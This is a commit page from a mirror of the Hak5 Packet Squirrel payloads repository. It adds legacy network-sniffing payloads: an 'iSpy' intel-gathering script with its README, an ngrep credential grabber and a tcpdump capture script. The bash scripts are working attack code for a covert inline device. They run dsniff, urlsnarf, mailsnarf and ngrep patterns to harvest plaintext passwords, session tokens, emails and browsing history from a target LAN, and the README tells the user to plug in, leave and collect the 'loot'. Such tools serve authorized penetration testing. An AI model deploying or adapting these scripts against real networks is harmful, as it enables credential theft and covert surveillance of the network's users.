HAK5/packetsquirrel-payloads
1
0
Fork 0
mirror of https://github.com/hak5/packetsquirrel-payloads.git synced 2025-12-19 09:48:47 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update repos for Packet Squirrel Mk 2 release

Browse Source
This commit is contained in:
Mike Kershaw / Dragorn
2023-07-24 14:58:18 -04:00
parent 2181bf89e5
commit d3250b4165
56 changed files with 731 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

61
legacy-mk1/payloads/library/sniffing/ispyintel/README.md Normal file
View File

@@ -0,0 +1,61 @@
| | |
|:----------------|:---------------------------------------------------------------------------------------------------|
| **Title** | iSpy Passive Intel Gathering |
| **Description** | Launches various tools to sniff out intel data. Payload will run until the button is pressed. |
| **Author** | [infoskirmish.com](http://www.infoskirmish.com) |
| **Version** | 1.0 |
| **Category** | sniffing |
| **Target** | Any |
| **Net Mode** | Any (you choose) |
| Meaning | Color | Description |
|:----------|:-----------------:|:----------------------------|
| SUCCESS: | Blink Green | Payload ended complete |
| CLEAN UP: | Rapid White | Payload is shutting down |
| FAIL: | Blink Red | No USB storage found |
| ATTACK: | Blink Yellow | Payload is loging traffic |
This payload will automate gathering various recon data on whatever passes between it's Ethernet ports. Since all the data log file names are marked with a unique date stamp you can freely move from target to target deploy, gather, collect, move on without fear you are overwriting previous logs.
### **Requirements**
+ USB access to store loot.
### **Setup**
1. Edit the config variables at the top.
The main variables are:
lootPath="/mnt/loot/intel" # Path to loot
mode="TRANSPARENT" # Network mode we want to use
interface="br-lan" # Interface to listen on
2) Copy payload.sh into the ~/payloads/switch<n> folder you wish to deploy on.
3) Connect into a target machine with access to the LAN.
4) Set switch to the <n> spot and power up.
5) Leave, get coffee, take a nap while everything is recorded and parsed for future use.
6) When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.
7) When all is done the LED will just go blank. It is now safe to unplug and go about your day.
### **Tasks that are started**
| Task | About |
|:---------|:-----------------------------------------------------------------------------|
|tcpdump | So you have a record of every packet that was TX and RX |
|urlsnarf | So you can see all websites that were visited |
|dsniff | Will attempt to acquire passwords and what not |
|ngrep | On ports 80 and 21 with the filter for common password fields |
|ngrep | On ports 80 and 21 with the filter for common session id fields |
|log.txt | Logs the progress of the payload for easy troubleshooting. |
### **Clean Up**
Once completed (aka when the button is pressed) the payload will automatically parse the TCPDump log file for the following items and store the results in separate files. Note the TCPDump raw pcap file is left unharmed and still freely available for your dissecting pleasure.
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.
+ ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains
+ maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.

187
legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh Normal file
View File

@@ -0,0 +1,187 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: iSpy Passive Intel Gathering
# Description: Launches various tools to sniff out intel data.
# Payload will run until the button is pressed.
# Author: infoskirmish.com
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: Any (default: Transparent)
# LEDs
# SUCCESS: Payload ended complete
# FAIL: No USB storage found
lootPath="/mnt/loot/intel" # Path to loot
mode="TRANSPARENT" # Network mode we want to use
interface="lo" # Interface to listen on
Date=$(date +%Y-%m-%d-%H%M) # Date format to use for log files
dsnifflog="dsniff_$Date.log" # DSNiff log file name
urlsnifflog="urlsnarf_$Date.log" # URLSniff log file name
tcpdumplog="tcpdump_$Date.pcap" # TCPDump log file name
httppwdlog="httpPasswords_$Date.pcap" # Potential HTTP password file name
sessionidlog="sessionids_$Date.pcap" # Potential Session IDs file name
mailsnarfLog="mailsnarf_$Date.log" # Mailsnarf data log file path.
function monitor_space() {
while true
do
[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill URLSnarff
echo "URLSnarff ending pid=$1" >> $1/log.txt
kill $1
wait $1
# Kill DNSniff
echo "DNSniff ending pid=$2" >> $2/log.txt
kill $2
wait $2
# Kill TCPDump
echo "TCPDump ending pid=$3" >> $3/log.txt
kill $3
wait $3
# Kill HTTP Password NGREP
echo "HTTP Password NGREP ending pid=$4" >> $4/log.txt
kill $4
wait $4
# Kill Session NGREP
echo "HTTP Session NGREP ending pid=$5" >> $5/log.txt
kill $5
wait $5
# Kill Mail Snarf
echo "Mail Snarf ending pid=$6" >> $6/log.txt
kill $6
wait $6
# I found that if this payload had been running awhile the next two steps may take a bit. It is useful to have some kind of indication
# that the payload accepted your button push and is responding. Thus the rapid white blink.
LED W VERYFAST
# Dump all unique IP address from TCP Dump file.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | sort | uniq >> $lootPath/ipv4found_$Date.txt
# Ok this is a really stupid grep pattern matching to search for emails; it is meant to give an over view of what is possible.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -Eiv "[\.]{2}" | grep -oE "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort | uniq >> $lootPath/maybeEmails_$Date.txt
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system; turn off LED
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p $lootPath &> /dev/null
# Start tcpdump on the specified interface
tcpdump -i $interface -w $lootPath/$tcpdumplog &>/dev/null &
tpid=$!
# Log TCP Dump Start
echo "TCPDump started pid=$tpid" >> $lootPath/log.txt
# Start urlsnarff on the specified interface
urlsnarf -n -i $interface >> $lootPath/$urlsnifflog &
urlid=$!
# Log URL Snarff Start
echo "URLSnarf started pid=$urlid" >> $lootPath/log.txt
# Start dsniff on the specified interface
dsniff -c -m -i $interface -w $lootPath/$dsnifflog &
dsniffid=$!
# Log DSNiff Start
echo "DSNiff started pid=$dsniffid" >> $lootPath/log.txt
# Log potential plain text user names and passwords on port 80 and 21
# The thing is port 21 is the defult ftp port. Passwords and user names are exchanged in clear text!!!
ngrep -d $interface -i "user_pass|userid|pass|pwd|password|login|user_login|usr|USER" -W byline port 80 or port 21 -O $lootPath/$httppwdlog &
pwdgrep=$!
# Log Password NGREP Start
echo "Password NGREP started pid=$pwdgrep" >> $lootPath/log.txt
# Log potential plain text session ids, tokens, etc.
ngrep -d $interface -i "session|sessid|token|loggedin|PHPSESSID|CFTOKEN|CFID|JSESSIONID|sessionid" -W byline port 80 or port 21 -O $lootPath/$sessionidlog &
sessiongrep=$!
# Log Session NGREP Start
echo "Session NGREP started pid=$sessiongrep" >> $lootPath/log.txt
# Log mailsnarf data
mailsnarf -i $interface $lootPath/$mailsnarflog &
mailsnarfid=$!
# Log mailsnarf Start.
echo "Mailsnarf started pid=$mailsnarfid" >> $lootPath/log.txt
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $urlid $dsniffid $tpid $pwdgrep $sessiongrep $mailsnarfid
}
# This payload will only run if we have USB storage
if [ -d "/mnt/loot" ]; then
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE $mode >> $lootPath/log.txt
sleep 5
# Lets make sure the interface the user wanted actually exisits.
if [[ $(ifconfig |grep $interface) ]]; then
echo "" > $lootPath/log.txt
LED ATTACK
run &
monitor_space $! &
else
# Interface could not be found; log it in ~/payload/switch1/log.txt
ifconfig > $lootPath/log.txt
echo "Could not load interface $interface. Stopping..." >> $lootPath/log.txt
# Display FAIL LED
LED FAIL
fi
else
# USB storage could not be found; log it in ~/payload/switch1/log.txt
echo "Could not load USB storage. Stopping..." > log.txt
# Display FAIL LED
LED FAIL
fi

79
legacy-mk1/payloads/library/sniffing/ngrep/payload.sh Executable file
View File

@@ -0,0 +1,79 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# ngrep payload to snag creds
NGREP_OPTIONS=("-wiql" "user|pass" "port" "21")
CONDITION=""
WCNUM=3
BUTTON_WAIT="5s"
LOOT_DIR="/mnt/loot/ngrep"
LOG_FILE="${LOOT_DIR}/ngrep-${RANDOM}.log"
function syncFS() {
while true
do
sync
sleep 5
done
}
function setup() {
LED OFF
NETMODE TRANSPARENT
sleep 5
mkdir -p $LOOT_DIR
}
function checkLog() {
[[ -z $CONDITION ]] && {
grep -qi $CONDITION $LOG_FILE && {
return 0
}
} || {
[[ $(wc -l < $LOG_FILE) -gt $WCNUM ]] && {
return 0
}
}
return 1
}
function run() {
ngrep "${NGREP_OPTIONS[@]}" 2>&1 > $LOG_FILE &
npid=$!
while true
do
NO_LED=true BUTTON && {
checkLog && {
BUTTON $BUTTON_WAIT && {
LED FINISH
kill $npid
sleep 3
LED OFF
halt
}
} || {
LED FAIL
sleep 3
LED OFF
}
}
done
}
[[ ! -f /mnt/NO_MOUNT ]] && {
setup
syncFS &
run
} || {
LED FAIL
}

12
legacy-mk1/payloads/library/sniffing/ngrep/readme.md Normal file
View File

@@ -0,0 +1,12 @@
# ngrep payload
Credits: Hak5Darren, Sebkinne
Small Edit: SebSeifert
# Description
Does packet sniffing stuff
If the Button is pressed you have x seconds to push the button one more time. If pressed the payload ends and cleans up. Else it keeps running.
## Options
BUTTON_WAIT = The seconds you can wait until the button must be pressed to end the payload.

71
legacy-mk1/payloads/library/sniffing/tcpdump/payload.sh Executable file
View File

@@ -0,0 +1,71 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: TCPDump
# Description: Dumps networking-data to USB storage. Completes on button-press or storage full.
# Author: Hak5
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: TRANSPARENT
# LEDs
# SUCCESS: Dump complete
# FAIL: No USB storage found
function monitor_space() {
while true
do
[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill TCPDump and sync filesystem
kill $1
wait $1
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p /mnt/loot/tcpdump &> /dev/null
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE TRANSPARENT
sleep 5
# Start tcpdump on the bridge interface
tcpdump -i br-lan -s 0 -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
tpid=$!
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $tpid
}
# This payload will only run if we have USB storage
[[ ! -f /mnt/NO_MOUNT ]] && {
LED ATTACK
run &
monitor_space $! &
} || {
LED FAIL
}